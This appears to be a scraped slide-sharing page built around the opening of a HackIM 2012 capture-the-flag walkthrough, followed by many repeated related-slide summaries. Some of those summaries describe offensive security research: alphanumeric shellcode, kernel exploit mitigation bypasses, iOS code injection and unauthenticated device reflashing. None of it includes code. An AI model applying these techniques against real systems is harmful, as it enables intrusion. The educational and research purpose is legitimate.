The document provides hints and solutions for various levels of a CTF (capture the flag) competition. It includes 7 sections with 5 levels each related to topics like trivia, cryptography, programming, web exploitation, reverse engineering, log analysis, and forensics. For each level, it describes the challenge, any provided hints, analysis of clues, and the final flag solution. The author encourages readers to try solving the challenges independently before reviewing the writeup.
Python supports multiple programming paradigms, including object-oriented, imperative and functional programming or procedural styles. It features a dynamic type system and automatic memory management and has a large and comprehensive standard library.
A slightly modified version of original "An introduction to Python
for absolute beginners" slides. For credits please check the second page. I used this presentation for my company's internal Python course.
This document summarizes the basics of memory management in Python. It discusses key concepts like variables, objects, references, and reference counting. It explains how Python uses reference counting with generational garbage collection to manage memory and clean up unused objects. The document also covers potential issues with reference counting like cyclic references and threads, and how the global interpreter lock impacts multi-threading in Python.
The document introduces the Django web framework for Python. It provides an overview of Django's philosophies such as loose coupling, quick development and the DRY principle. It then demonstrates how to build a basic blog application in Django with models, views, templates and URLs. Finally, it discusses additional Django features like generic views and real-world code snippets.
This document provides an overview of the Python programming language, including its history, key features, syntax examples, and common uses. It also discusses how Python can be used under Linux and some potential issues.
This document provides an agenda and overview for a Python training course. The agenda covers key Python topics like dictionaries, conditional statements, loops, functions, modules, input/output, error handling, object-oriented programming and more. The introduction section explains that Python is an interpreted, interactive and object-oriented language well-suited for beginners. It also outlines features like rapid development, automatic memory management and support for procedural and object-oriented programming. The document concludes by explaining Python's core data types including numbers, strings, lists, tuples and dictionaries.
Daniel Greenfeld gave a presentation titled "Intro to Python". The presentation introduced Python and covered 21 cool things that can be done with Python, including running Python anywhere, learning Python quickly, introspecting Python objects, working with strings, lists, generators, sets and dictionaries. The presentation emphasized Python's simplicity, readability, extensibility and how it can be used for a wide variety of tasks.
Python supports multiple programming paradigms, including object-oriented, imperative and functional programming or procedural styles. It features a dynamic type system and automatic memory management and has a large and comprehensive standard library.
A slightly modified version of original "An introduction to Python
for absolute beginners" slides. For credits please check the second page. I used this presentation for my company's internal Python course.
This document summarizes the basics of memory management in Python. It discusses key concepts like variables, objects, references, and reference counting. It explains how Python uses reference counting with generational garbage collection to manage memory and clean up unused objects. The document also covers potential issues with reference counting like cyclic references and threads, and how the global interpreter lock impacts multi-threading in Python.
The document introduces the Django web framework for Python. It provides an overview of Django's philosophies such as loose coupling, quick development and the DRY principle. It then demonstrates how to build a basic blog application in Django with models, views, templates and URLs. Finally, it discusses additional Django features like generic views and real-world code snippets.
This document provides an overview of the Python programming language, including its history, key features, syntax examples, and common uses. It also discusses how Python can be used under Linux and some potential issues.
This document provides an agenda and overview for a Python training course. The agenda covers key Python topics like dictionaries, conditional statements, loops, functions, modules, input/output, error handling, object-oriented programming and more. The introduction section explains that Python is an interpreted, interactive and object-oriented language well-suited for beginners. It also outlines features like rapid development, automatic memory management and support for procedural and object-oriented programming. The document concludes by explaining Python's core data types including numbers, strings, lists, tuples and dictionaries.
Daniel Greenfeld gave a presentation titled "Intro to Python". The presentation introduced Python and covered 21 cool things that can be done with Python, including running Python anywhere, learning Python quickly, introspecting Python objects, working with strings, lists, generators, sets and dictionaries. The presentation emphasized Python's simplicity, readability, extensibility and how it can be used for a wide variety of tasks.
PHP extensions allow modifying and extending the PHP language. There are different types of extensions including wrapper extensions for interfacing with C libraries, speed and algorithm extensions for optimizing slow code, and Zend extensions for modifying the PHP engine. Writing extensions requires knowledge of C, the PHP internals including zvals and the PHP lifecycle, and using tools like phpize to generate the extension scaffolding. The document provides guidance on setting up a development environment, writing extension code, and testing extensions. It also outlines best practices for extension coding.
This document summarizes Ange Albertini's talk on "Funky file Formats". The talk discusses how files can take on multiple formats by exploiting ambiguities and tolerance in file specifications. Examples are given of files that are valid images, archives, documents, and encrypted files simultaneously. The talk also covers steganography techniques like hiding files within other file formats by manipulating metadata or unused portions of file specifications. Overall, the talk illustrates the concept of "format polymorphism" where single files can masquerade as multiple file types to evade detection or trigger different parser behaviors.
Python is a great programming language. It is a complete tutorial of using this programming language.
This slides is split into two parts, and it is the second part. Another part is at: http://www.slideshare.net/moskytw/programming-with-python-basic.
This document provides an introduction to the Python programming language. It covers basic Python concepts like data types, strings, data structures, classes, methods, exceptions, iterations, generators, and scopes. Python is described as an easy to learn, read, and use dynamic language with a large selection of stable libraries. It is presented as being much easier than bash scripts for building and maintaining complex system infrastructure.
The document discusses several key points about Python:
1. It summarizes praise for Python from programmers and companies like Google, NASA, and CCP Games, highlighting Python's simplicity, compactness, and ability to quickly develop applications.
2. It introduces common Python concepts like strings, lists, sequences, namespaces, polymorphism, and duck typing. Strings can be manipulated using slicing and methods. Lists and other sequences support indexing, slicing, and iteration.
3. Python uses name-based rather than type-based polymorphism through duck typing - an object's capabilities are defined by its methods and properties rather than its class.
DEF CON 27 - SMEA - adventures in smart buttplug penetration testingFelipe Prado
The document discusses teledildonics and vulnerabilities in IoT sex toys. It analyzes the Lovense Hush butt plug and its accompanying USB dongle and mobile app. The analysis finds the dongle firmware contains a buggy JSON parser that can be exploited to crash the dongle or potentially execute code. It also finds the Hush and dongle firmware can both be reflashed over serial using their bootloader modes, without authentication. This could allow compromising the devices.
Clone Digger is a tool that detects duplicate code in Python and Java programs. It works at the abstract syntax tree level to find code clones, which are sequences of statements that are similar after replacing variables, functions, constants, etc. Detecting clones is important because it can reduce maintenance costs by identifying code that needs to be refactored or corrected only in one place. Clone Digger can be installed and run from the command line to generate a report of any found clones.
This document discusses Java bytecode fundamentals including:
- Bytecode is composed of one-byte instructions with ~200 opcodes in use
- The javap tool can be used to disassemble classes and view bytecode
- The Java Virtual Machine is stack-based and each thread has a stack frame containing an operand stack and local variables
- Bytecode instructions manipulate the stack and local variables to implement method calls and object initialization
It is the slides for COSCUP[1] 2013 Hands-on[2], "Learning Python from Data".
It aims for using examples to show the world of Python. Hope it will help you with learning Python.
[1] COSCUP: http://coscup.org/
[2] COSCUP Hands-on: http://registrano.com/events/coscup-2013-hands-on-mosky
This document provides an overview of Python for Unix and Linux System Administration by Noah Gift and Jeremy M. Jones. It includes information about related O'Reilly titles, conferences, and online resources from O'Reilly such as oreilly.com and oreillynet.com. It also discusses the Safari Bookshelf online reference library and upcoming O'Reilly conferences.
The document provides guidance on how to write PHP extensions in C. It discusses compiling extensions, writing tests, handling data types, using object-oriented features like classes, and documenting extensions. Key steps include setting up the build environment, adding basic scaffolding, writing tests, getting and returning data, and releasing extensions on PECL. Advanced topics covered are globals, memory management, custom objects, and thread safety. The document aims to explain the full process for writing reliable and well-integrated PHP extensions.
JRuby, Not Just For Hard-Headed Pragmatists AnymoreErin Dees
JRuby bills itself as the pragmatic Ruby, the go-to implementation when you need to fit into the Java universe or support a ton of platforms.
Who knew it was also a tool for having fun exploring the realms of computer science?
University of Virginia
cs4414: Operating Systems
http://rust-class.org
Explicit vs. Automatic Memory Management
Garbage Collection, Reference Counting
Rust ownership types
For embedded notes, see: http://rust-class.org/class9-pointers-in-rust.html
Basic Python Programming: Part 01 and Part 02Fariz Darari
This document discusses basic Python programming concepts including strings, functions, conditionals, loops, imports and recursion. It begins with examples of printing strings, taking user input, and calculating areas of shapes. It then covers variables and data types, operators, conditional statements, loops, functions, imports, strings, and recursion. Examples are provided throughout to demonstrate each concept.
This document provides an introduction and overview of the Python programming language. It discusses what Python is, its features, applications, and how to install Python on Windows and Linux systems. It also covers Python basics like variables, data types, operators, comments, conditional statements like if/else, and loops like for, while, and nested loops. Examples are provided for key concepts. The document is intended as a beginner tutorial for learning Python.
Random And Dynamic Images Using Python CgiAkramWaseem
This document discusses using Python to generate random and dynamic images through CGI scripts. It begins with an overview and introduction to Python CGI programming and the Python Imaging Library (PIL). It then demonstrates a simple Python CGI script that serves a static image file. Next, it shows a random image script that selects a random image file from a directory. The document also covers using PIL to dynamically generate images and build a script that generates a random gradient image. It concludes by discussing building more advanced dynamic image scripts that accept arguments and graph log files.
Python Workshop - Learn Python the Hard WayUtkarsh Sengar
This document provides an introduction to learning Python. It discusses prerequisites for Python, basic Python concepts like variables, data types, operators, conditionals and loops. It also covers functions, files, classes and exceptions handling in Python. The document demonstrates these concepts through examples and exercises learners to practice char frequency counting and Caesar cipher encoding/decoding in Python. It encourages learners to practice more to master the language and provides additional learning resources.
This document introduces Python and discusses its main features and advantages over other languages like Java. Python is described as a high-level, multi-paradigm language with simple yet powerful semantics and a focus on productivity. It discusses how Python code is more concise, readable and fun to write compared to Java, C#, and other languages. Python trusts the programmer and aims to avoid getting in the way. It also has a rich standard library and ecosystem of third-party libraries.
The document provides a walkthrough for 12 levels of the HackIM 2011 capture the flag competition. For each level, it describes any hints or clues, screenshots of relevant information, and step-by-step instructions for solving the level. It also identifies potential pitfalls or distractions in solving each level. The walkthrough is intended to help participants learn how to solve the various challenges of the HackIM competition.
PHP extensions allow modifying and extending the PHP language. There are different types of extensions including wrapper extensions for interfacing with C libraries, speed and algorithm extensions for optimizing slow code, and Zend extensions for modifying the PHP engine. Writing extensions requires knowledge of C, the PHP internals including zvals and the PHP lifecycle, and using tools like phpize to generate the extension scaffolding. The document provides guidance on setting up a development environment, writing extension code, and testing extensions. It also outlines best practices for extension coding.
This document summarizes Ange Albertini's talk on "Funky file Formats". The talk discusses how files can take on multiple formats by exploiting ambiguities and tolerance in file specifications. Examples are given of files that are valid images, archives, documents, and encrypted files simultaneously. The talk also covers steganography techniques like hiding files within other file formats by manipulating metadata or unused portions of file specifications. Overall, the talk illustrates the concept of "format polymorphism" where single files can masquerade as multiple file types to evade detection or trigger different parser behaviors.
Python is a great programming language. It is a complete tutorial of using this programming language.
This slides is split into two parts, and it is the second part. Another part is at: http://www.slideshare.net/moskytw/programming-with-python-basic.
This document provides an introduction to the Python programming language. It covers basic Python concepts like data types, strings, data structures, classes, methods, exceptions, iterations, generators, and scopes. Python is described as an easy to learn, read, and use dynamic language with a large selection of stable libraries. It is presented as being much easier than bash scripts for building and maintaining complex system infrastructure.
The document discusses several key points about Python:
1. It summarizes praise for Python from programmers and companies like Google, NASA, and CCP Games, highlighting Python's simplicity, compactness, and ability to quickly develop applications.
2. It introduces common Python concepts like strings, lists, sequences, namespaces, polymorphism, and duck typing. Strings can be manipulated using slicing and methods. Lists and other sequences support indexing, slicing, and iteration.
3. Python uses name-based rather than type-based polymorphism through duck typing - an object's capabilities are defined by its methods and properties rather than its class.
DEF CON 27 - SMEA - adventures in smart buttplug penetration testingFelipe Prado
The document discusses teledildonics and vulnerabilities in IoT sex toys. It analyzes the Lovense Hush butt plug and its accompanying USB dongle and mobile app. The analysis finds the dongle firmware contains a buggy JSON parser that can be exploited to crash the dongle or potentially execute code. It also finds the Hush and dongle firmware can both be reflashed over serial using their bootloader modes, without authentication. This could allow compromising the devices.
Clone Digger is a tool that detects duplicate code in Python and Java programs. It works at the abstract syntax tree level to find code clones, which are sequences of statements that are similar after replacing variables, functions, constants, etc. Detecting clones is important because it can reduce maintenance costs by identifying code that needs to be refactored or corrected only in one place. Clone Digger can be installed and run from the command line to generate a report of any found clones.
This document discusses Java bytecode fundamentals including:
- Bytecode is composed of one-byte instructions with ~200 opcodes in use
- The javap tool can be used to disassemble classes and view bytecode
- The Java Virtual Machine is stack-based and each thread has a stack frame containing an operand stack and local variables
- Bytecode instructions manipulate the stack and local variables to implement method calls and object initialization
It is the slides for COSCUP[1] 2013 Hands-on[2], "Learning Python from Data".
It aims for using examples to show the world of Python. Hope it will help you with learning Python.
[1] COSCUP: http://coscup.org/
[2] COSCUP Hands-on: http://registrano.com/events/coscup-2013-hands-on-mosky
This document provides an overview of Python for Unix and Linux System Administration by Noah Gift and Jeremy M. Jones. It includes information about related O'Reilly titles, conferences, and online resources from O'Reilly such as oreilly.com and oreillynet.com. It also discusses the Safari Bookshelf online reference library and upcoming O'Reilly conferences.
The document provides guidance on how to write PHP extensions in C. It discusses compiling extensions, writing tests, handling data types, using object-oriented features like classes, and documenting extensions. Key steps include setting up the build environment, adding basic scaffolding, writing tests, getting and returning data, and releasing extensions on PECL. Advanced topics covered are globals, memory management, custom objects, and thread safety. The document aims to explain the full process for writing reliable and well-integrated PHP extensions.
JRuby, Not Just For Hard-Headed Pragmatists AnymoreErin Dees
JRuby bills itself as the pragmatic Ruby, the go-to implementation when you need to fit into the Java universe or support a ton of platforms.
Who knew it was also a tool for having fun exploring the realms of computer science?
University of Virginia
cs4414: Operating Systems
http://rust-class.org
Explicit vs. Automatic Memory Management
Garbage Collection, Reference Counting
Rust ownership types
For embedded notes, see: http://rust-class.org/class9-pointers-in-rust.html
Basic Python Programming: Part 01 and Part 02Fariz Darari
This document discusses basic Python programming concepts including strings, functions, conditionals, loops, imports and recursion. It begins with examples of printing strings, taking user input, and calculating areas of shapes. It then covers variables and data types, operators, conditional statements, loops, functions, imports, strings, and recursion. Examples are provided throughout to demonstrate each concept.
This document provides an introduction and overview of the Python programming language. It discusses what Python is, its features, applications, and how to install Python on Windows and Linux systems. It also covers Python basics like variables, data types, operators, comments, conditional statements like if/else, and loops like for, while, and nested loops. Examples are provided for key concepts. The document is intended as a beginner tutorial for learning Python.
Random And Dynamic Images Using Python CgiAkramWaseem
This document discusses using Python to generate random and dynamic images through CGI scripts. It begins with an overview and introduction to Python CGI programming and the Python Imaging Library (PIL). It then demonstrates a simple Python CGI script that serves a static image file. Next, it shows a random image script that selects a random image file from a directory. The document also covers using PIL to dynamically generate images and build a script that generates a random gradient image. It concludes by discussing building more advanced dynamic image scripts that accept arguments and graph log files.
Python Workshop - Learn Python the Hard WayUtkarsh Sengar
This document provides an introduction to learning Python. It discusses prerequisites for Python, basic Python concepts like variables, data types, operators, conditionals and loops. It also covers functions, files, classes and exceptions handling in Python. The document demonstrates these concepts through examples and exercises learners to practice char frequency counting and Caesar cipher encoding/decoding in Python. It encourages learners to practice more to master the language and provides additional learning resources.
This document introduces Python and discusses its main features and advantages over other languages like Java. Python is described as a high-level, multi-paradigm language with simple yet powerful semantics and a focus on productivity. It discusses how Python code is more concise, readable and fun to write compared to Java, C#, and other languages. Python trusts the programmer and aims to avoid getting in the way. It also has a rich standard library and ecosystem of third-party libraries.
The document provides a walkthrough for 12 levels of the HackIM 2011 capture the flag competition. For each level, it describes any hints or clues, screenshots of relevant information, and step-by-step instructions for solving the level. It also identifies potential pitfalls or distractions in solving each level. The walkthrough is intended to help participants learn how to solve the various challenges of the HackIM competition.
writing self-modifying code and utilizing advanced assembly techniquesRussell Sanford
This document provides instructions for creating shellcode using only alphanumeric characters. It begins by outlining the plan, which is to use IMUL and XOR instructions to reconstruct bytes not in the alphanumeric range. It then provides a blueprint, explaining how IMUL and XOR can be used to generate needed values. The first code example walks through transforming an existing 24-byte shellcode into an alphanumeric version by pushing and popping values and using XOR to zero registers.
Monitoring a program that monitors computer networksAndrey Karpov
There exists the NetXMS project, which is a software product designed to monitor computer systems and networks. It can be used to monitor the whole IT-infrastructure, from SNMP-compatible devices to server software. And I am naturally going to monitor the code of this project with the PVS-Studio analyzer.
A Unicorn Seeking Extraterrestrial Life: Analyzing SETI@home's Source CodePVS-Studio
The document analyzes the source code of the SETI@home project using a static code analyzer. The analysis found relatively few errors, indicating high code quality. Some issues discussed include incorrect operator precedence leading to logic errors, empty methods that should return values, pointer dereferencing before checking for null, undefined behavior from negative number shifts, and inefficient string length calls in loops. Overall the review uncovered some minor defects but showed the code is generally well written.
Sphinx autodoc - automated api documentation - PyCon.KR 2015Takayuki Shimizukawa
Using the automated documentation feature of Sphinx, you can make with ease the extensive documentation of Python program.
You just write python function documents (docstrings), Sphinx organizes them into the document, can be converted to a variety of formats.
In this session, I'll explain a documentation procedure that uses with sphinx autodoc and autosummary extensions.
The document describes various bugs encountered by the speaker in coding projects. It begins by outlining bugs found in Node.js that were truncating JSON files being downloaded. Through debugging steps like adding log statements and packet sniffing, the issue was traced to an "end" event not properly resuming a stream. Hardware bugs are also discussed, like issues in early Pentium chips. The document concludes with lessons learned, like the importance of fully reproducing bugs and using tools like strace to analyze processes.
Sphinx autodoc - automated API documentation (PyCon APAC 2015 in Taiwan)Takayuki Shimizukawa
This document discusses Sphinx, an open source documentation generator for Python projects. It describes how Sphinx works with reStructuredText markup and extensions like autodoc to automatically generate API documentation from docstrings in Python source code. Key points include setting up a Sphinx project, using directives like automodule to import modules and generate documentation, and extensions like doctest that allow testing code examples in docstrings.
Archeology for Entertainment, or Checking Microsoft Word 1.1a with PVS-StudioAndrey Karpov
The document discusses analyzing the source code of Microsoft Word 1.1a from 1990 using the PVS-Studio static analyzer. Some key findings include:
1. An infinite loop was found in a function due to an unsigned variable being decreased indefinitely.
2. A typo led to an array overrun by accessing beyond the bounds of a 5 element array.
3. Several instances of undefined behavior were discovered where variables were modified between uses.
4. Other issues included uninitialized variables, incorrect format strings in printf, and logical errors in conditions.
Despite the age of the code, the analysis revealed several bugs, demonstrating static analysis remains useful on older code bases.
[Ruxcon 2011] Post Memory Corruption Memory AnalysisMoabi.com
The document introduces PMCMA, a debugger tool that analyzes memory corruption bugs by forcing processes to fork, overwriting memory locations in the offspring processes, and monitoring execution to map exploitable scenarios. PMCMA aims to provide a roadmap for exploitation by identifying vulnerabilities and possible exploitation techniques like truncating function pointers or exploiting 4-byte aligned memory writes. The tool is available online and has received over 10,000 downloads in its first two months.
Title: Embedded Security Analysis Task: Side Channel Analysis and Fault Injection
Objective:
The objective of this task is to assess your ability to work with Python tools, C programming,
Computer Architecture, and apply side channel analysis and fault injection techniques to
uncover a hidden flag embedded within an ELF file compiled for an STM32 processor. You will
use the Lascar and Rainbow tools from Ledger's repository to analyze the binary and retrieve
the hidden flag.
Requirements:
1. Proficiency in Python programming.
2. Basic understanding of side channel analysis and fault injection concepts.
3. Familiarity with ELF file format and embedded systems.
Task Description:
Setup and Familiarization:
1. Clone the Ledger's repository containing Lascar and Rainbow tools.
2. Install the necessary dependencies and set up the environment as per the provided
documentation.
3. Review the documentation and examples to understand how Lascar and Rainbow tools
are used for side channel analysis and fault injection.
Binary Analysis:
1. You will be provided with an ELF file compiled for an STM32 processor.
2. Study the provided stubbed source code for the binary to understand its functionality and
potential vulnerabilities.
Side Channel Analysis/ Fault Injection:
1. Choose a specific side channel analysis technique or fault injection technique based on
your analysis of the binary.
2. Implement the chosen technique using Lascar or Rainbow tools to extract information
from the binary.
3. Document your approach, code snippets, and any findings from the side channel
analysis.
4. Provide a detailed explanation of your fault injection methodology, along with relevant
code snippets and observations.
Flag Retrieval:
1. Apply the insights gained from side channel analysis and fault injection to uncover the
hidden secret embedded within the binary.
2. Document the process you followed to successfully retrieve the secret.
3. Provide the extracted secret as proof of completion.
Evaluation Criteria:
You will be evaluated based on the following criteria:
1. Understanding of side channel analysis and fault injection concepts.
2. Proficiency in understanding the assignment and applying conceptual knowledge in
practice.
3. Explanation of the approach taken.
4. Successful retrieval of the hidden flag.
Submit all scripts, analysis, images, documentation in form of a zip file directly to Cypherock.
AI Machine Learning Complete Course: for PHP & Python DevsAmr Shawqy
Course Discounted Link:
https://www.udemy.com/ai-machine-learning-complete-course/?couponCode=SLIDESHAREDISCOUNT
Become an AI & Machine Learning developer, one of employer's most requested skills for 2018/2019!
Add value to your solutions and products, it is time to start using AI & Machine Learning now!
This course is different than any other AI or Machine Learning course; it requires no prior knowledge in AI or Machine Learning before, and you will be able to have your own AI Machine Learning application up and running right after the course.
This course is straight-forward, practical, and gives you all what you need to start your career in Machine Learning and Data Science. If you are a developer, programmer, technical student, manager, team leader, and you have not explored AI and Machine Learning before, this course is the best, most exciting, and complete course for you.
Examples of how you can build applications that identifies a string language, identify colors, identify human actions "like jump, sleep, anger, sadness etc." in a video, identify if a tweet or a Facebook post is positive or negative, that are all a few examples of what you can do in this course, all explained and you can do it all by yourself during the step by stop journey in this course.
This course will make all AI concepts, terminology, and approaches clear for you, so you understand how everything around you is going, and takes you in a series of a very interesting hands-on step by step examples on how to build amazing AI applications.
The following topics are covered:
- AI
- Rule & Logic Based AI
- Machine Learning
- Machine Learning Types (Supervised, Unsupervised, Reinforced, etc.)
- Machine Learning Algorithms
- Neural Networks & Deep Neural Networks
- Deep Learning
- PHP Step by Step Examples
- Python Step by Step Examples
- Language Detection
- Color Detection
- Human Actions Identification in Videos
- General String Classification
- Handling numerical data, string data, image data, voice data, and video data.
- PHP-ML
- scikit-learn
- numpy
- TensorFlow
- TensorFlow Hub
- Neural Networks Math Step by Step
- And Much More!
A Replay Approach to Software ValidationJames Pascoe
The document discusses a replay approach to software validation using regular expressions in C++11 and Python. It describes replaying log files to recreate events and find bugs faster. It also explains how regular expressions can be used to parse log files and validate replayed logs by comparing them to the originals. Regular expressions in C++11 and Python are compatible, which is useful for cross-language validation tools.
Sphinx autodoc - automated API documentation (EuroPython 2015 in Bilbao)Takayuki Shimizukawa
Takayuki Shimizukawa discusses how to generate documentation from Python source code using Sphinx. He introduces Sphinx and its extensions for automating documentation generation from docstrings. He demonstrates setting up a Sphinx project and configuring extensions like autodoc, autosummary, and doctest to generate API documentation and test code examples. The presentation emphasizes best practices for writing informative docstrings and code examples to fully document modules and functions.
Post exploitation techniques on OSX and Iphone, EuSecWest 2009Vincenzo Iozzo
The document discusses post-exploitation techniques on macOS and iOS. It summarizes a technique called "userland-exec" that allows executing binaries on macOS without involving the kernel. It then describes efforts to port this technique to iOS by injecting libraries instead of binaries due to code signing restrictions. The author demonstrates injecting an unsigned library into a process on a factory iPhone by hijacking the dlopen function and loading the library from memory. This technique paves the way for developing advanced payloads like Meterpreter on unmodified iOS devices.
XCon 2014 => http://xcon.xfocus.org/
In the past was quite common to exploit heap / pool manager vulnerabilities attacking its internal linked structures. However current memory management improve a lot and at current date it is quite ineffective to attack heap in this way. But still those techniques come into hand when we start to looking at linked structures widespread throughout kernel that are unfortunately not hardened enough.
In this presentation we will examine power of these vulnerabilities by famous example “CVE – 2013 - 3660”. Showing bypass on ‘lazy’ assertions of _LIST_ENTRY, present exploitation after party and teleport to kernel.
Shellcode Disassembling - Reverse EngineeringSumutiu Marius
This document provides a basic guide to reverse engineering Linux x86 shellcode. It summarizes reversing two sample shellcodes: 1) A simple shellcode that reads the /etc/passwd file, and 2) An XOR encrypted shellcode that launches a new ksh shell with root privileges. It explains breaking down the shellcode using a debugger to understand what it is doing by examining registers, system calls and related functions. The goal is to understand how the shellcode works rather than just trusting its described purpose.
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesPeter Hlavaty
The document discusses exploiting TrueType font (TTF) vulnerabilities to achieve kernel code execution on Windows systems. It begins by describing the discovery of exploitable bugs in a TTF fuzzer. Despite mitigations like KASLR, NX, SMAP, and CFG, the researchers were able to bypass these protections through techniques like controlled overflows, abusing plain kernel structures, and function-driven attacks. They show how to leverage wild overflows, control kernel memory layout, and hijack control flow to achieve arbitrary code execution. The document emphasizes that OS design weaknesses allow bypassing modern defenses through clever bug chaining and memory manipulation.
Infrastructure as code might be literally impossible part 2ice799
The document discusses various issues with infrastructure as code including complexities that arise from software licenses, bugs, and inconsistencies across tools and platforms. Specific examples covered include problems with SSL and APT package management on Debian/Ubuntu, Linux networking configuration difficulties, and inconsistencies in Python packaging related to naming conventions for packages containing hyphens, underscores, or periods. Potential causes discussed include legacy code, lack of time for thorough testing and bug fixing, and economic pressures against developing fully working software systems.
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024Neo4j
Neha Bajwa, Vice President of Product Marketing, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
Best 20 SEO Techniques To Improve Website Visibility In SERPPixlogix Infotech
Boost your website's visibility with proven SEO techniques! Our latest blog dives into essential strategies to enhance your online presence, increase traffic, and rank higher on search engines. From keyword optimization to quality content creation, learn how to make your site stand out in the crowded digital landscape. Discover actionable tips and expert insights to elevate your SEO game.
UiPath Test Automation using UiPath Test Suite series, part 5DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 5. In this session, we will cover CI/CD with devops.
Topics covered:
CI/CD with in UiPath
End-to-end overview of CI/CD pipeline with Azure devops
Speaker:
Lyndsey Byblow, Test Suite Sales Engineer @ UiPath, Inc.
How to Get CNIC Information System with Paksim Ga.pptxdanishmna97
Pakdata Cf is a groundbreaking system designed to streamline and facilitate access to CNIC information. This innovative platform leverages advanced technology to provide users with efficient and secure access to their CNIC details.
Maruthi Prithivirajan, Head of ASEAN & IN Solution Architecture, Neo4j
Get an inside look at the latest Neo4j innovations that enable relationship-driven intelligence at scale. Learn more about the newest cloud integrations and product enhancements that make Neo4j an essential choice for developers building apps with interconnected data and generative AI.
In his public lecture, Christian Timmerer provides insights into the fascinating history of video streaming, starting from its humble beginnings before YouTube to the groundbreaking technologies that now dominate platforms like Netflix and ORF ON. Timmerer also presents provocative contributions of his own that have significantly influenced the industry. He concludes by looking at future challenges and invites the audience to join in a discussion.
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slackshyamraj55
Discover the seamless integration of RPA (Robotic Process Automation), COMPOSER, and APM with AWS IDP enhanced with Slack notifications. Explore how these technologies converge to streamline workflows, optimize performance, and ensure secure access, all while leveraging the power of AWS IDP and real-time communication via Slack notifications.
Building Production Ready Search Pipelines with Spark and MilvusZilliz
Spark is the widely used ETL tool for processing, indexing and ingesting data to serving stack for search. Milvus is the production-ready open-source vector database. In this talk we will show how to use Spark to process unstructured data to extract vector representations, and push the vectors to Milvus vector database for search serving.
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...Neo4j
Leonard Jayamohan, Partner & Generative AI Lead, Deloitte
This keynote will reveal how Deloitte leverages Neo4j’s graph power for groundbreaking digital twin solutions, achieving a staggering 100x performance boost. Discover the essential role knowledge graphs play in successful generative AI implementations. Plus, get an exclusive look at an innovative Neo4j + Generative AI solution Deloitte is developing in-house.
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!SOFTTECHHUB
As the digital landscape continually evolves, operating systems play a critical role in shaping user experiences and productivity. The launch of Nitrux Linux 3.5.0 marks a significant milestone, offering a robust alternative to traditional systems such as Windows 11. This article delves into the essence of Nitrux Linux 3.5.0, exploring its unique features, advantages, and how it stands as a compelling choice for both casual users and tech enthusiasts.
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc
How does your privacy program stack up against your peers? What challenges are privacy teams tackling and prioritizing in 2024?
In the fifth annual Global Privacy Benchmarks Survey, we asked over 1,800 global privacy professionals and business executives to share their perspectives on the current state of privacy inside and outside of their organizations. This year’s report focused on emerging areas of importance for privacy and compliance professionals, including considerations and implications of Artificial Intelligence (AI) technologies, building brand trust, and different approaches for achieving higher privacy competence scores.
See how organizational priorities and strategic approaches to data security and privacy are evolving around the globe.
This webinar will review:
- The top 10 privacy insights from the fifth annual Global Privacy Benchmarks Survey
- The top challenges for privacy leaders, practitioners, and organizations in 2024
- Key themes to consider in developing and maintaining your privacy program
Removing Uninteresting Bytes in Software FuzzingAftab Hussain
Imagine a world where software fuzzing, the process of mutating bytes in test seeds to uncover hidden and erroneous program behaviors, becomes faster and more effective. A lot depends on the initial seeds, which can significantly dictate the trajectory of a fuzzing campaign, particularly in terms of how long it takes to uncover interesting behaviour in your code. We introduce DIAR, a technique designed to speedup fuzzing campaigns by pinpointing and eliminating those uninteresting bytes in the seeds. Picture this: instead of wasting valuable resources on meaningless mutations in large, bloated seeds, DIAR removes the unnecessary bytes, streamlining the entire process.
In this work, we equipped AFL, a popular fuzzer, with DIAR and examined two critical Linux libraries -- Libxml's xmllint, a tool for parsing xml documents, and Binutil's readelf, an essential debugging and security analysis command-line tool used to display detailed information about ELF (Executable and Linkable Format). Our preliminary results show that AFL+DIAR does not only discover new paths more quickly but also achieves higher coverage overall. This work thus showcases how starting with lean and optimized seeds can lead to faster, more comprehensive fuzzing campaigns -- and DIAR helps you find such seeds.
- These are slides of the talk given at IEEE International Conference on Software Testing Verification and Validation Workshop, ICSTW 2022.
GraphRAG for Life Science to increase LLM accuracyTomaz Bratanic
GraphRAG for life science domain, where you retriever information from biomedical knowledge graphs using LLMs to increase the accuracy and performance of generated answers
GraphRAG for Life Science to increase LLM accuracy
HackIM 2012 CTF Walkthrough
1. My Acknowledgement To:
Anant Shrivastava (infinity), Prashant KV (kvbhai), Dhanesh K (danny),
Riyaz Walikar (karniv0re), Murtuja Bharmal (void), Aseem Jakhar (@),
Rahul Sasi (FB1H2S), Pardhasaradhi CH (pardhu), Chaithu Rk (Antagonist),
Amol Naik (AMol NAik), Prince Boonlia (boonlia), Atul Alex Cherian
(Aodrulez), Pushkar Pashupat (push), Abhisek Datta (adatta), Ajit Hatti
(adh), Bipin Upadhyay (om), Hemanshu Asolia (h3m4n), Shannon Morse
(snubs) & Team from Hak5 - Trust Your Technolust
2. Few cheeky lines that will gear up the CTF thrill:
- Kitne level the, 35 sardaar.
- A computer, plenty of time, lots of patience and a challenging CTF, what else does a
hacker need to be happy?
- Don't cry at the beginning of the CTF. Cry at the end of the CTF.
- Unfortunately, no one can be told what the CTF is. You have to see it for yourself
- I know why you're playing CTF, Neo. I know what you've been doing... why you hardly
sleep, why you live alone and why night after night, you sit by your computer. You're
looking for the flag. I know because I was once looking for the same thing. I was looking
for an answer. It's the question that drives us, Neo. It's the question that brought you here.
You know the question, just as I did.
Before everything else, A word, in fact a request: Kindly avoid going
through this writeup before you have attempted with your wildest
idea, your weird assumptions, your hottest tools, craziest Einstein’s
formula, or a logic that never fails.
Brief Overview of CTF Layout:
CTF was divided into 7 sections, each with 5 levels of challenges.
1. Trivia Levels: Brain-teasers/Riddles
2. Crypto Levels: Mystified ciphers/Substitutions.
3. Programming Levels: Mathematical logic/Hash Cracking.
4. Web Levels: Redirection/ Injection.
5. Reverse Engineering Levels: PE /Apk/Memory Dump.
6. Log Analysis: Analyzing, pcap/scanner generated logs.
7. Forensics Level: Incident Analysis
